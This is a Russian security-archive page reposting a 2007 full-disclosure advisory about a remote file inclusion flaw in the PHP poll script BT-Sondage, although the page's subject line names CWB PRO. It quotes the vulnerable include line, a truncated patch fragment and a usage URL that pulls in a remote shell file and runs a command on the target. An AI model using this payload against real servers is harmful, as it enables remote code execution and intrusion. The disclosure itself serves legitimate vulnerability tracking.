Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Full-disclosure] Wordpress 2.1.2 xmlrpc Vulnerabilities

  CWB PRO Version 1.
5(INCLUDE_PATH)
Remote File Include Vulnerabilites

  Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability

  MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability

From:Crackers_Child <localexploit_(at)_hotmail.com>
Date:5 апреля 2007 г.
Subject:CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites

--------------------------------------------------------------------------------



Title : BT-Sondage-v112 Remote File Include Vulnerability

--------------------------------------------------------------------------------


#Author: Crackers_Child


#[email protected]: [email protected]

--------------------------------------------------------------------------------


Affected software description :
--------------------------------------------------------------------------------


Application :  BT-Sondage
URL :  http://www.phpscripts-fr.net/scripts/download.php?id=1575

--------------------------------------------------------------------------------



dork        : Download Script :)
Exploit     :

--------------------------------------------------------------------------------


Vulnerable Codes .n gestion_sondage.php


include($repertoire_visiteur.'utilitaires/affichage_formulaire.
php');

For Patch .t add

if ( !defined( "_GESTION_SONDAGE_PHP" ) )
{

--------------------------------------------------------------------------------



Usage:

http://[target]/[sondage_path]/utilitaires/gestion_sondage.
php?repertoire_visiteur=Shell.txt?&cmd=ls


--------------------------------------------------------------------------------


greets: EveryBody :=)

--------------------------------------------------------------------------------


Note : Melek Bir Yandan .eytan Bir Yandan Bas.m Zindan Yardim Et Allah'.m Yardim :(

--------------------------------------------------------------------------------


# milw0rm.com [2007-04-01]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород